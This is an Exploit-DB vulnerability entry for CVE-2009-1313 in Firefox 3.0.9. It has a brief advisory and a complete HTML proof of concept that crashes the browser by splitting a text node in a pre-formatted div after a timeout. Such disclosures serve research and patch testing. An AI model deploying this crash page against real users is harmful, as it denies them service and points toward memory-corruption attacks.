Mozilla Firefox 3.0.9 - 'nsTextFrame::ClearTextRun' Remote Memory Corruption Vulnerability

2009-04-27T00:00:00
ID EDB-ID:32961
Type exploitdb
Reporter Marc Gueury
Modified 2009-04-27T00:00:00

Description

Mozilla Firefox 3.0.9 'nsTextFrame::ClearTextRun()' Remote Memory Corruption Vulnerability. CVE-2009-1313. Dos exploit for linux platform

                                        
                                            source: http://www.securityfocus.com/bid/34743/info

Mozilla Firefox is prone to a remote memory-corruption vulnerability.

Successful exploits will allow remote attackers to execute arbitrary code within the context of the affected browser or crash the browser, denying service to legitimate users. 

<html><head><title> Bug 489647 - New 1.9.0.9 topcrash [@nsTextFrame::ClearTextRun()]</title></head> <body> <div id="a" style="white-space: pre;"> m</div> <script> function doe() { document.getElementById('a').childNodes[0].splitText(1); } setTimeout(doe, 100); </script> </body> </html>